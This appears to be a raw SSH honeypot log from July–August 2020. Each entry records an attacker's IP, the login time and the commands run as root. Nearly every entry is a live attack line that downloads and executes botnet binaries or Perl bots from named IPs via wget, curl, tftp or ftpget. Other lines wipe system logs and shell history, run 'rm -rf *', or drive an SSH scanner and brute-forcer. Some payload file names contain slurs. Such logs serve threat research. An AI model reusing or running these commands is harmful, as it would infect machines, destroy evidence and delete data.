Exec cat /etc/issue ; cd /tmp || cd /run || cd /; wget http://46.4.152.178/reportmybinsfaggotbins.sh; chmod 777 reportmybinsfaggotbins.sh; sh reportmybinsfaggotbins.sh; tftp 46.4.152.178 -c get reportmybinsfaggottftp1.sh; chmod 777 reportmybinsfaggottftp1.sh; sh reportmybinsfaggottftp1.sh; tftp -r reportmybinsfaggottftp2.sh -g 46.4.152.178; chmod 777 reportmybinsfaggottftp2.sh; sh reportmybinsfaggottftp2.sh; rm -rf reportmybinsfaggotbins.sh reportmybinsfaggottftp1.sh reportmybinsfaggottftp2.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /run || cd /
wget http://46.4.152.178/reportmybinsfaggotbins.sh
chmod 777 reportmybinsfaggotbins.sh
sh reportmybinsfaggotbins.sh
tftp 46.4.152.178 -c get reportmybinsfaggottftp1.sh
chmod 777 reportmybinsfaggottftp1.sh
sh reportmybinsfaggottftp1.sh
tftp -r reportmybinsfaggottftp2.sh -g 46.4.152.178
chmod 777 reportmybinsfaggottftp2.sh
sh reportmybinsfaggottftp2.sh
rm -rf reportmybinsfaggotbins.sh reportmybinsfaggottftp1.sh reportmybinsfaggottftp2.sh
rm -rf *

From 209.141.47.92 9-Jul-2020 00:18:32 ssh2 root
Exec cat /etc/issue; busybox wget http://205.185.117.32/x86_64;  chmod 777 *; ./x86_64 linux.x86
cat /etc/issue
busybox wget http://205.185.117.32/x86_64
chmod 777 *
./x86_64 linux.x86

From 37.49.224.35 9-Jul-2020 12:07:50 ssh2 root
Exec wget 45.95.168.219/SBIDIOT/root; chmod +x root; ./root
wget 45.95.168.219/SBIDIOT/root
chmod +x root
./root

From 93.157.62.102 9-Jul-2020 13:20:40 ssh2 root
Exec wget http://194.180.224.134/5311qjmikurawepedalnqmashrabotatuk61119123c/KigaNet.x86; chmod 777 *; ./KigaNet.x86 Roots; rm -rf Kiga*; history -c
wget http://194.180.224.134/5311qjmikurawepedalnqmashrabotatuk61119123c/KigaNet.x86
chmod 777 *
./KigaNet.x86 Roots
rm -rf Kiga*
history -c

From 45.95.168.250 9-Jul-2020 15:46:15 ssh2 root
Exec wget http://45.95.168.250/x86; chmod 777 x86; ./x86 ; rm -rf x86; history -c
wget http://45.95.168.250/x86
chmod 777 x86
./x86
rm -rf x86
history -c

From 45.95.168.176 9-Jul-2020 17:33:22 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://37.49.226.35/YesK4Pz9CJ7dQ0EUhkwc3tXSWoR5rB/Meth.x86; cat Meth.x86 > sn0rt; chmod +x sn0rt; ./sn0rt ROOTED; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://37.49.226.35/YesK4Pz9CJ7dQ0EUhkwc3tXSWoR5rB/Meth.x86
cat Meth.x86 > sn0rt
chmod +x sn0rt
./sn0rt ROOTED
history -c

From 116.127.106.194 10-Jul-2020 11:35:31 ssh2 root
Exec echo "cd /tmp; rm -f *.sh; wget http://46.246.38.61/wget.sh || curl http://46.246.38.61/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh
echo "cd /tmp
rm -f *.sh
wget http://46.246.38.61/wget.sh || curl http://46.246.38.61/curl.sh -o curl.sh
chmod +x *.sh
./wget.sh
./curl.sh" | sh

From 37.176.182.134 10-Jul-2020 17:12:50 ssh2 root
w
wget
ps -x
uname -a
cat /etc/issue
rm -rf /var/log/wtmp
rm -rf /var/log/secure
rm -rf /var/log/xferlog
rm -rf /var/log/messages
rm -rf /var/run/utmp
touch /var/run/utmp
touch /var/log/messages
touch /var/log/wtmp
touch /var/log/messages
touch /var/log/xferlog
touch /var/log/secure
touch /var/log/lastlog
rm -rf /var/log/maillog
touch /var/log/maillog
history -r
unset HISTFILE HISTSAVE HISTMOVE HISTZONE HISTORY HISTLOG USERHOST REMOTEHOST REMOTEUSER
echo > /var/run/utmp
echo > var/log/wtmp
echo > /var/log/lastlog
history -c
rm -rf .bash_history
su root
cd
ls -a
uname -a
cd /tmp
ls -a
nproc
set history +o
wget apagency.jp/a/bash.tgz
tar -xvf bash.tgz
rm -rf bash.tgz
cd .bash
chmod +x *
./go -k
history -c
wget
wget apagency.jp/a/bash.tgz
tar -xvf bash.tgz
rm -rf bash.tgz
cd .bash
chmod +x *
./go -k
history -c
curl

From 45.143.221.54 10-Jul-2020 22:31:22 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.143.220.79/kwari.sh; curl -O http://45.143.220.79/kwari.sh; chmod 777 kwari.sh; sh kwari.sh; tftp 45.143.220.79 -c get kwari.sh; chmod 777 kwari.sh; sh kwari.sh; tftp -r kwari2.sh -g 45.143.220.79; chmod 777 kwari2.sh; sh kwari2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.143.220.79 kwari1.sh kwari1.sh; sh kwari1.sh; rm -rf kwari.sh kwari.sh kwari2.sh kwari1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.143.220.79/kwari.sh
curl -O http://45.143.220.79/kwari.sh
chmod 777 kwari.sh
sh kwari.sh
tftp 45.143.220.79 -c get kwari.sh
chmod 777 kwari.sh
sh kwari.sh
tftp -r kwari2.sh -g 45.143.220.79
chmod 777 kwari2.sh
sh kwari2.sh
ftpget -v -u anonymous -p anonymous -P 21 45.143.220.79 kwari1.sh kwari1.sh
sh kwari1.sh
rm -rf kwari.sh kwari.sh kwari2.sh kwari1.sh
rm -rf *

From 23.129.64.194 11-Jul-2020 22:37:54 ssh2 root
Exec echo 14SGG9JDDG
echo 14SGG9JDDG

From 45.143.220.79 11-Jul-2020 23:57:36 ssh2 root
Exec cd /tmp; wget http://45.143.220.79/bins/FederalAgency.x86; chmod 777 *; ./FederalAgency.x86 ssh rm -rf *
cd /tmp
wget http://45.143.220.79/bins/FederalAgency.x86
chmod 777 *
./FederalAgency.x86 ssh rm -rf *

From 45.95.168.250 12-Jul-2020 11:51:39 ssh2 root
Exec wget http://161.35.225.189/bins/jKira.x86; chmod 777 jKira.x86; ./jKira.x86 roots
wget http://161.35.225.189/bins/jKira.x86
chmod 777 jKira.x86
./jKira.x86 roots

From 45.143.220.55 13-Jul-2020 09:46:40 ssh2 root
Exec cd /tmp; wget http://45.143.220.55/5311qjmikurawepedalnqmashrabotatu
rm -fr /root/good/banner.lo
rm -fr /root/good/mfu.txt

./boner xjh 22 3500
cat banner.log  |grep SSH-2.0-OpenSSH |awk '{print }' |uniq |shuf >> mfu.txt
victims=34559
./brute 9999 -f mfu.tx
rm -fr /root/good/banner.log
rm -fr /root/good/mfu.txt

./boner xji 22 3500
cat banner.log  |grep SSH-2.0-OpenSSH |awk '{print }' |uniq |shuf >> mfu.txt
victims=34559
./brute 9999 -f mfu.txt pass_file 22 cd
cd /tmp
wget http://45.143.220.55/5311qjmikurawepedalnqmashrabotatu rm -fr /root/good/banner.lo rm -fr /root/good/mfu.txt ./boner xjh 22 3500 cat banner.log |grep SSH-2.0-OpenSSH |awk '{print }' |uniq |shuf >> mfu.txt victims=34559 ./brute 9999 -f mfu.tx rm -fr /root/good/banner.log

From 37.49.224.156 14-Jul-2020 09:25:06 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.95.168.230/YesK4Pz9CJ7dQ0EUhkwc3tXSWoR5rB/Meth.x86; cat Meth.x86 > saoas; chmod +x saoas; ./saoas ROOTED; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://45.95.168.230/YesK4Pz9CJ7dQ0EUhkwc3tXSWoR5rB/Meth.x86
cat Meth.x86 > saoas
chmod +x saoas
./saoas ROOTED
history -c

From 193.228.91.11 15-Jul-2020 15:27:44 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.105/ss.sh; curl -O http://193.228.91.105/ss.sh; chmod 777 ss.sh; sh ss.sh; tftp 193.228.91.105 -c get tfJDs1.sh; chmod 777 tfJDs1.sh; sh tfJDs1.sh; tftp -r tftSdvkzb.sh -g 193.228.91.105; chmod 777 tftSdvkzb.sh; sh tftSdvkzb.sh; ftpget -v -u anonymous -p anonymous -P 21 193.228.91.105 ftpSedr1.sh ftpSedr1.sh; sh ftpSedr1.sh; rm -rf ss.sh tfJDs1.sh tftSdvkzb.sh ftpSedr1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://193.228.91.105/ss.sh
curl -O http://193.228.91.105/ss.sh
chmod 777 ss.sh
sh ss.sh
tftp 193.228.91.105 -c get tfJDs1.sh
chmod 777 tfJDs1.sh
sh tfJDs1.sh
tftp -r tftSdvkzb.sh -g 193.228.91.105
chmod 777 tftSdvkzb.sh
sh tftSdvkzb.sh
ftpget -v -u anonymous -p anonymous -P 21 193.228.91.105 ftpSedr1.sh ftpSedr1.sh
sh ftpSedr1.sh
rm -rf ss.sh tfJDs1.sh tftSdvkzb.sh ftpSedr1.sh
rm -rf *

From 34.96.128.247 16-Jul-2020 15:47:41 ssh2 root
Exec cat /etc/issue ; cd /tmp ; wget 178.62.34.137/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 178.62.34.137/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c
cat /etc/issue
cd /tmp
wget 178.62.34.137/bot.pl
perl bot.pl
rm -rf bot.pl
curl -O 178.62.34.137/bot.pl
perl bot.pl
rm -rf bot.pl
history -c

From 51.75.52.118 18-Jul-2020 10:07:27 ssh2 root
Exec echo KSH2XK369K
echo KSH2XK369K

From 145.239.1.182 18-Jul-2020 12:07:00 ssh2 root
Exec echo 91QSNDPHCV
echo 91QSNDPHCV

From 77.247.181.163 19-Jul-2020 01:56:03 ssh2 root
Exec echo 2GCJWTGPYH
echo 2GCJWTGPYH

From 82.78.158.146 19-Jul-2020 07:07:36 ssh2 root
ls
w
cd /tmp
wget nasapaul.com/ninfo
nproc

From 82.78.158.146 19-Jul-2020 07:08:30 ssh2 root
ps -x
ls
perl test.pl
apt-get
apt-get install perl -y
apt-get install perl -y install perl -y perl -y -y install perl -y install perl -y perl -y -y perl -y install perl -y perl -y -y -y install perl -y
ls
perl test.pl
./network.pl
clear
reboot
cd
clear

From 82.78.158.146 19-Jul-2020 07:10:49 ssh2 root
ls
cat network.pl
cat test1.pl
ls -a
clear
ls -a
.bash_history
cat .bash_history
halt
kill -9 -1

From 129.232.217.205 19-Jul-2020 08:55:50 ssh2 root
Exec cat /etc/issue ; cd /tmp ; wget 129.232.217.205/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 129.232.217.205/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c
cat /etc/issue
cd /tmp
wget 129.232.217.205/bot.pl
perl bot.pl
rm -rf bot.pl
curl -O 129.232.217.205/bot.pl
perl bot.pl
rm -rf bot.pl
history -c

From 23.129.64.190 19-Jul-2020 09:19:58 ssh2 root
Exec echo FXMK7ZQUJD
echo FXMK7ZQUJD

From 104.42.168.203 19-Jul-2020 14:43:10 ssh2 root
Exec cat /etc/issue ; cd /tmp ; wget 104.42.168.203/bot.pl ; curl -O 104.42.168.203 ; perl bot.pl ; rm -rf bot* ; history -c ; echo nite was here <3
cat /etc/issue
cd /tmp
wget 104.42.168.203/bot.pl
curl -O 104.42.168.203
perl bot.pl
rm -rf bot*
history -c
echo nite was here <3

From 107.187.122.10 20-Jul-2020 16:15:34 ssh2 root
Exec cat /etc/issue ; cd /tmp ; wget 105.29.64.133/bot.pl ; curl -O 105.29.64.133 ; perl bot.pl ; rm -rf bot* ; history -c ; echo nite was here <3 > nitewasherenigga
cat /etc/issue
cd /tmp
wget 105.29.64.133/bot.pl
curl -O 105.29.64.133
perl bot.pl
rm -rf bot*
history -c
echo nite was here <3 > nitewasherenigga

From 209.141.47.92 20-Jul-2020 20:36:22 ssh2 root
Exec wget http://185.132.53.130/bins/x86; chmod 777 x86; ./x86 x86
wget http://185.132.53.130/bins/x86
chmod 777 x86
./x86 x86

From 31.159.234.199 21-Jul-2020 04:27:56 ssh2 root
w
uname -a
ps -x
ip r
ifconfig
rm -rf /var/log/wtmp
rm -rf /var/log/secure
rm -rf /var/log/xferlog
rm -rf /var/log/messages
rm -rf /var/run/utmp
touch /var/run/utmp
touch /var/log/messages
touch /var/log/wtmp
touch /var/log/messages
touch /var/log/xferlog
touch /var/log/secure
touch /var/log/lastlog
rm -rf /var/log/maillog
touch /var/log/maillog
history -r
unset HISTFILE HISTSAVE HISTMOVE HISTZONE HISTORY HISTLOG USERHOST REMOTEHOST REMOTEUSER
echo > /var/run/utmp
echo > var/log/wtmp
echo > /var/log/lastlog
history -c
rm -rf .bash_history
passwd
wget ips.originbreak.fail/auto.jpg
tar xzvf auto.jpg
cd .random
mv -- linux -sh
./autorun
cd ..
rm -rf auto.jpg
wget ips.originbreak.fail/auto.jpg
curl
ftp -v
lwp-download
cat /etc/issue

From 104.42.168.203 21-Jul-2020 19:52:55 ssh2 root
Exec cat /etc/issue ; cd /tmp ; wget 105.29.64.133/bot.pl ; curl -O 105.29.64.133 ; perl bot.pl ; rm -rf bot* ; history -c ; echo nite was here <3
cat /etc/issue
cd /tmp
wget 105.29.64.133/bot.pl
curl -O 105.29.64.133
perl bot.pl
rm -rf bot*
history -c
echo nite was here <3

From 194.34.132.19 22-Jul-2020 07:54:36 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://107.189.10.184/axisbins.sh; chmod 777 axisbins.sh; sh axisbins.sh; rm -rf axisbins.sh;rm -rf *; clear;history -c; clear;history -w
cd /tmp || cd /run || cd /
wget http://107.189.10.184/axisbins.sh
chmod 777 axisbins.sh
sh axisbins.sh
rm -rf axisbins.sh
rm -rf *
clear
history -c
clear
history -w

From 185.162.235.163 22-Jul-2020 10:05:18 ssh2 root
Exec cd /tmp; wget http://185.63.253.26/christianmingle.x86; chmod 777 christianmingle.x86; ./christianmingle.x86 servers; rm -rf *
cd /tmp
wget http://185.63.253.26/christianmingle.x86
chmod 777 christianmingle.x86
./christianmingle.x86 servers
rm -rf *

From 113.109.247.66 28-Jul-2020 00:29:18 ssh2 root
Exec echo "cd /tmp; rm -f *.sh; wget http://46.246.43.212/wget.sh || curl http://46.246.43.212/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh
echo "cd /tmp
rm -f *.sh
wget http://46.246.43.212/wget.sh || curl http://46.246.43.212/curl.sh -o curl.sh
chmod +x *.sh
./wget.sh
./curl.sh" | sh

From 185.132.53.123 28-Jul-2020 05:32:27 ssh2 root
Exec wget http://185.132.53.2/bin.sh; chmod 777 bin.sh; sh bin.sh ; rm -rf bin.sh
wget http://185.132.53.2/bin.sh
chmod 777 bin.sh
sh bin.sh
rm -rf bin.sh

From 206.189.196.222 28-Jul-2020 14:14:33 ssh2 root
Exec wget http://185.132.53.2/bins/jKira.x86; chmod 777 jKira.x86; ./jKira.x86 roots
wget http://185.132.53.2/bins/jKira.x86
chmod 777 jKira.x86
./jKira.x86 roots

From 194.180.224.130 29-Jul-2020 04:03:31 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.110/netlab.sh; curl -O http://193.228.91.110/netlab.sh; chmod 777 netlab.sh; sh netlab.sh; tftp 193.228.91.110 -c get netlab.sh; chmod 777 netlab.sh; sh netlab.sh; tftp -r netlab2.sh -g 193.228.91.110; chmod 777 netlab2.sh; sh netlab2.sh; ftpget -v -u anonymous -p anonymous -P 21 193.228.91.110 netlab1.sh netlab1.sh; sh netlab1.sh; ftpget -v -u anonymous -p anonymous -P 21 193.228.91.110 netlab1.sh netlab1.sh; sh netlab1.sh; rm -rf netlab.sh netlab.sh netlab2.sh netlab1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://193.228.91.110/netlab.sh
curl -O http://193.228.91.110/netlab.sh
chmod 777 netlab.sh
sh netlab.sh
tftp 193.228.91.110 -c get netlab.sh
chmod 777 netlab.sh
sh netlab.sh
tftp -r netlab2.sh -g 193.228.91.110
chmod 777 netlab2.sh
sh netlab2.sh
ftpget -v -u anonymous -p anonymous -P 21 193.228.91.110 netlab1.sh netlab1.sh
sh netlab1.sh
ftpget -v -u anonymous -p anonymous -P 21 193.228.91.110 netlab1.sh netlab1.sh
sh netlab1.sh
rm -rf netlab.sh netlab.sh netlab2.sh netlab1.sh
rm -rf *

From 110.87.24.30 30-Jul-2020 20:38:50 ssh2 root
Exec echo "cd /tmp; rm -f *.sh; wget http://46.246.44.216/wget.sh || curl http://46.246.44.216/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh
echo "cd /tmp
rm -f *.sh
wget http://46.246.44.216/wget.sh || curl http://46.246.44.216/curl.sh -o curl.sh
chmod +x *.sh
./wget.sh
./curl.sh" | sh

From 37.49.224.156 30-Jul-2020 23:40:31 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://37.49.230.128/taevimncorufglbzhwxqpdkjs/Meth.x86; cat Meth.x86 > sn0rt; chmod +x sn0rt; ./sn0rt ROOTED; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://37.49.230.128/taevimncorufglbzhwxqpdkjs/Meth.x86
cat Meth.x86 > sn0rt
chmod +x sn0rt
./sn0rt ROOTED
history -c

From 54.225.27.67 31-Jul-2020 03:31:02 ssh2 root
Exec echo "cd /tmp; rm -f *.sh; wget http://46.246.44.213/wget.sh || curl http://46.246.44.213/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh
echo "cd /tmp
rm -f *.sh
wget http://46.246.44.213/wget.sh || curl http://46.246.44.213/curl.sh -o curl.sh
chmod +x *.sh
./wget.sh
./curl.sh" | sh

From 107.187.122.10 31-Jul-2020 03:52:59 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /run || cd /; wget http://93.114.82.21/nitebins.sh; chmod 777 nitebins.sh; sh nitebins.sh; tftp 93.114.82.21 -c get nitetftp1.sh; chmod 777 nitetftp1.sh; sh nitetftp1.sh; tftp -r nitetftp2.sh -g 93.114.82.21; chmod 777 nitetftp2.sh; sh nitetftp2.sh; rm -rf nitebins.sh nitetftp1.sh nitetftp2.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /run || cd /
wget http://93.114.82.21/nitebins.sh
chmod 777 nitebins.sh
sh nitebins.sh
tftp 93.114.82.21 -c get nitetftp1.sh
chmod 777 nitetftp1.sh
sh nitetftp1.sh
tftp -r nitetftp2.sh -g 93.114.82.21
chmod 777 nitetftp2.sh
sh nitetftp2.sh
rm -rf nitebins.sh nitetftp1.sh nitetftp2.sh
rm -rf *

From 45.156.187.150 31-Jul-2020 11:48:24 ssh2 root
Exec cd /tmp; wget http://94.100.28.201/x-8.6-.GHOUL; chmod 777 *; ./x-8.6-.GHOUL roots; rm -rf *
cd /tmp
wget http://94.100.28.201/x-8.6-.GHOUL
chmod 777 *
./x-8.6-.GHOUL roots
rm -rf *

From 37.49.224.156 1-Aug-2020 12:56:13 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://37.49.224.189/taevimncorufglbzhwxqpdkjs/Meth.x86; cat Meth.x86 > sn0rt; chmod +x sn0rt; ./sn0rt ROOTED; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://37.49.224.189/taevimncorufglbzhwxqpdkjs/Meth.x86
cat Meth.x86 > sn0rt
chmod +x sn0rt
./sn0rt ROOTED
history -c

From 107.187.122.10 2-Aug-2020 13:43:07 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /run || cd /; wget http://93.114.82.21/nitebins.sh; chmod 777 nitebins.sh; sh nitebins.sh; tftp 93.114.82.21 -c get nitetftp1.sh; chmod 777 nitetftp1.sh; sh nitetftp1.sh; tftp -r nitetftp2.sh -g 93.114.82.21; chmod 777 nitetftp2.sh; sh nitetftp2.sh; rm -rf nitebins.sh nitetftp1.sh nitetftp2.sh; rm -rf * ; cd /tmp ; wget 107.187.122.10/bot.pl ; perl bot.pl ; rm -rf bot* ; curl -O 107.187.122.10/bot.pl ; perl bot.pl ; rm -rf bot* ; history -c
cat /etc/issue
cd /tmp || cd /run || cd /
wget http://93.114.82.21/nitebins.sh
chmod 777 nitebins.sh
sh nitebins.sh
tftp 93.114.82.21 -c get nitetftp1.sh
chmod 777 nitetftp1.sh
sh nitetftp1.sh
tftp -r nitetftp2.sh -g 93.114.82.21
chmod 777 nitetftp2.sh
sh nitetftp2.sh
rm -rf nitebins.sh nitetftp1.sh nitetftp2.sh
rm -rf *
cd /tmp
wget 107.187.122.10/bot.pl
perl bot.pl
rm -rf bot*
curl -O 107.187.122.10/bot.pl
perl bot.pl
rm -rf bot*
history -c

From 34.71.129.32 3-Aug-2020 11:45:41 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://93.114.82.21/nitebins.sh; chmod 777 nitebins.sh; sh nitebins.sh; tftp 93.114.82.21 -c get nitetftp1.sh; chmod 777 nitetftp1.sh; sh nitetftp1.sh; tftp -r nitetftp2.sh -g 93.114.82.21; chmod 777 nitetftp2.sh; sh nitetftp2.sh; rm -rf nitebins.sh nitetftp1.sh nitetftp2.sh; rm -rf * ; cd /tmp ; wget 107.187.122.10/bot.pl ; perl bot.pl ; rm -rf bot* ; curl -O 107.187.122.10/bot.pl ; perl bot.pl ; rm -rf bot* ; history -c
cd /tmp || cd /run || cd /
wget http://93.114.82.21/nitebins.sh
chmod 777 nitebins.sh
sh nitebins.sh
tftp 93.114.82.21 -c get nitetftp1.sh
chmod 777 nitetftp1.sh
sh nitetftp1.sh
tftp -r nitetftp2.sh -g 93.114.82.21
chmod 777 nitetftp2.sh
sh nitetftp2.sh
rm -rf nitebins.sh nitetftp1.sh nitetftp2.sh
rm -rf *
cd /tmp
wget 107.187.122.10/bot.pl
perl bot.pl
rm -rf bot*
curl -O 107.187.122.10/bot.pl
perl bot.pl
rm -rf bot*
history -c

From 37.49.224.53 3-Aug-2020 12:10:45 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://37.49.224.101/z0z0z/al3x.x86; cat al3x.x86 > z1z2z5a6qw5asda; chmod +x z1z2z5a6qw5asda; ./z1z2z5a6qw5asda Rooted.VPS; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://37.49.224.101/z0z0z/al3x.x86
cat al3x.x86 > z1z2z5a6qw5asda
chmod +x z1z2z5a6qw5asda
./z1z2z5a6qw5asda Rooted.VPS
history -c

From 194.180.224.103 5-Aug-2020 05:09:06 ssh2 root
Exec wget http://193.228.91.124/uih7U8JY7Of7Y8O9d6t68IT67R8y76t7823tg8weuq/pwnNet.x86; chmod 777 *; ./pwnNet.x86 Roots
wget http://193.228.91.124/uih7U8JY7Of7Y8O9d6t68IT67R8y76t7823tg8weuq/pwnNet.x86
chmod 777 *
./pwnNet.x86 Roots

From 176.31.236.146 6-Aug-2020 04:18:38 ssh2 root
Exec echo 2PCR89EKMR
echo 2PCR89EKMR

From 176.58.77.114 8-Aug-2020 00:24:56 ssh2 root
ls
free -m

From 176.58.77.114 8-Aug-2020 00:25:38 ssh2 root
ls mbox

From 194.180.224.130 8-Aug-2020 00:39:08 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.242/8UsA.sh; curl -O http://194.15.36.242/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 194.15.36.242 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 194.15.36.242; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.15.36.242 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://194.15.36.242/8UsA.sh
curl -O http://194.15.36.242/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 194.15.36.242 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 194.15.36.242
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 194.15.36.242 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 194.180.224.103 8-Aug-2020 03:54:19 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /run || cd /; wget http://194.180.224.103/reportandyougaybins.sh; chmod 777 reportandyougaybins.sh; sh reportandyougaybins.sh; tftp 194.180.224.103 -c get reportandyougaytftp1.sh; chmod 777 reportandyougaytftp1.sh; sh reportandyougaytftp1.sh; tftp -r reportandyougaytftp2.sh -g 194.180.224.103; chmod 777 reportandyougaytftp2.sh; sh reportandyougaytftp2.sh; rm -rf reportandyougaybins.sh reportandyougaytftp1.sh reportandyougaytftp2.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /run || cd /
wget http://194.180.224.103/reportandyougaybins.sh
chmod 777 reportandyougaybins.sh
sh reportandyougaybins.sh
tftp 194.180.224.103 -c get reportandyougaytftp1.sh
chmod 777 reportandyougaytftp1.sh
sh reportandyougaytftp1.sh
tftp -r reportandyougaytftp2.sh -g 194.180.224.103
chmod 777 reportandyougaytftp2.sh
sh reportandyougaytftp2.sh
rm -rf reportandyougaybins.sh reportandyougaytftp1.sh reportandyougaytftp2.sh
rm -rf *

From 199.193.99.232 8-Aug-2020 09:21:05 ssh2 root
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l
Exec uname -a || echo -
uname -a || echo -

From 194.87.138.44 8-Aug-2020 11:55:06 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://194.15.36.155/loader.sh; chmod 777 loader.sh; sh loader.sh; tftp 194.15.36.155 -c get loaderftp1.sh; chmod 777 loaderftp1.sh; sh loaderftp1.sh; tftp -r loaderftp2.sh -g 194.15.36.155; chmod 777 loaderftp2.sh; sh loaderftp2.sh; rm -rf loader.sh loaderftp1.sh loaderftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://194.15.36.155/loader.sh
chmod 777 loader.sh
sh loader.sh
tftp 194.15.36.155 -c get loaderftp1.sh
chmod 777 loaderftp1.sh
sh loaderftp1.sh
tftp -r loaderftp2.sh -g 194.15.36.155
chmod 777 loaderftp2.sh
sh loaderftp2.sh
rm -rf loader.sh loaderftp1.sh loaderftp2.sh
rm -rf *

From 37.49.230.81 8-Aug-2020 14:39:18 ssh2 root
Exec cat /etc/issue ; cd /tmp ; wget 185.172.110.186/bins/meerkat.x86 ; chmod 777 meerkat.x86 ; ./meerkat.x86 sploit.x86 ; rm -rf meerkat* ; history -c ; wget 34.72.146.20/bot,pl ; perl bot.pl ; rm -rf bot.pl ; history -c
cat /etc/issue
cd /tmp
wget 185.172.110.186/bins/meerkat.x86
chmod 777 meerkat.x86
./meerkat.x86 sploit.x86
rm -rf meerkat*
history -c
wget 34.72.146.20/bot,pl
perl bot.pl
rm -rf bot.pl
history -c

From 37.49.230.81 8-Aug-2020 18:44:07 ssh2 root
Exec cat /etc/issue ; cd /tmp ; wget 51.161.107.124/bot,pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; cd /tmp; wget http://185.172.110.186/bins/neutrons.x86; curl http://185.172.110.186/bins/neutrons.x86; chmod 777 *; ./neutrons.x86 x86; rm -rf *
cat /etc/issue
cd /tmp
wget 51.161.107.124/bot,pl
perl bot.pl
rm -rf bot.pl
history -c
cd /tmp
wget http://185.172.110.186/bins/neutrons.x86
curl http://185.172.110.186/bins/neutrons.x86
chmod 777 *
./neutrons.x86 x86
rm -rf *

From 194.180.224.130 8-Aug-2020 21:24:59 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.118/netlab.sh; curl -O http://194.180.224.118/netlab.sh; chmod 777 netlab.sh; sh netlab.sh; tftp 194.180.224.118 -c get netlab.sh; chmod 777 netlab.sh; sh netlab.sh; tftp -r netlab2.sh -g 194.180.224.118; chmod 777 netlab2.sh; sh netlab2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.180.224.118 netlab1.sh netlab1.sh; sh netlab1.sh; ftpget -v -u anonymous -p anonymous -P 21 194.180.224.118 netlab1.sh netlab1.sh; sh netlab1.sh; rm -rf netlab.sh netlab.sh netlab2.sh netlab1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://194.180.224.118/netlab.sh
curl -O http://194.180.224.118/netlab.sh
chmod 777 netlab.sh
sh netlab.sh
tftp 194.180.224.118 -c get netlab.sh
chmod 777 netlab.sh
sh netlab.sh
tftp -r netlab2.sh -g 194.180.224.118
chmod 777 netlab2.sh
sh netlab2.sh
ftpget -v -u anonymous -p anonymous -P 21 194.180.224.118 netlab1.sh netlab1.sh
sh netlab1.sh
ftpget -v -u anonymous -p anonymous -P 21 194.180.224.118 netlab1.sh netlab1.sh
sh netlab1.sh
rm -rf netlab.sh netlab.sh netlab2.sh netlab1.sh
rm -rf *

From 88.218.16.235 8-Aug-2020 21:57:24 ssh2 root
Exec cd /tmp; wget http://185.206.93.87/x-8.6-.GHOUL; chmod 777 *; ./x-8.6-.GHOUL roots; rm -rf *
cd /tmp
